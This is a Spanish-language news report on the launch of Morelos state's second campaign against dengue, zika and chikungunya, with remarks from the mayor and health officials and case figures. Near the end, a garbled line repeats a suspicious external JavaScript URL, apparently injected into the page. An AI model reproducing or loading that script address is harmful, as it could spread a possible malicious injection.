Arranca Jesús Corona Damián, segunda jornada estatal de lucha contra el dengue, zika y chikungunya.

*El alcalde expresó que el gobierno a su cargo está en la mejor disposición de seguir trabajando de la mano y colaborando con el sector salud del Estado para dar un combate frontal y sin reservas en contra del mosco transmisor del dengue, zika y chikungunya.

El presidente municipal, Jesús Corona Damián, asistió esta mañana al arranque de la Segunda Jornada Estatal de Lucha contra el Dengue, Zika y Chikungunya en la Unidad Deportiva “José María Morelos y Pavón”.

En presencia del secretario de Salud del Estado, Marco Antonio Cantú Cuevas, el ejecutivo municipal expresó que el Gobierno a su cargo está en la mejor disposición de trabajar de la mano y colaborar con el sector salud del Estado para dar un combate frontal y sin reservas en contra del mosco transmisor del dengue, zika y chikungunya.

Al tomar la palabra, el director general de Servicios de Salud de Morelos (SSM), Héctor Barón Olivares, manifestó que la prevención y el combate en contra del vector no dependen únicamente de Servicios y de la Secretaría de Salud. “Tenemos que conjuntarnos e involucrarnos Servicios de Salud, Secretaría de Salud, autoridades municipales y la propia comunidad, para prevenir y combatir estas enfermedades”.

En el arranque se presentó la obra de teatro guiñol “No me molestes mosquito” con la participación de personal del departamento de Vectores de la Jurisdicción Sanitaria No. 3.

Al hacer uso de la voz, el secretario de Salud del Estado hizo un llamado a los ciudadanos del Estado a no bajar la guardia en esta lucha contra el vector, a sumar esfuerzos y participar en las acciones integrales de prevención y control de estos padecimientos.

Destacó que el trabajo conjunto y la educación en salud desde los hogares, permitirán que sea menos complicado el combate de estas tres enfermedades y se obtengan mejores resultados en bien de la salud de la población.

El funcionario estatal reveló que de enero a la fecha se han registrado 300 casos de dengue, de los cuales 217 son con signos de alarma y 6 graves, siendo la región oriente del Estado la que presenta la de mayor incidencia.

Precisó que son 11 casos de zika y 1 de chikungunya, y aseguró que no se han confirmado fallecimientos por dengue.

En su intervención, agradeció al alcalde y su equipo de trabajo “porque han sido un pilar importante en todo lo que tiene que ver con la promoción y la prevención de estas enfermedades trasmitidas por el mosco. Nos han apoyado muchísimo; muchas gracias”.

https://adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&www.facebook.com/BoletinDeMorelos/videos/459874657937345/

 

 

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *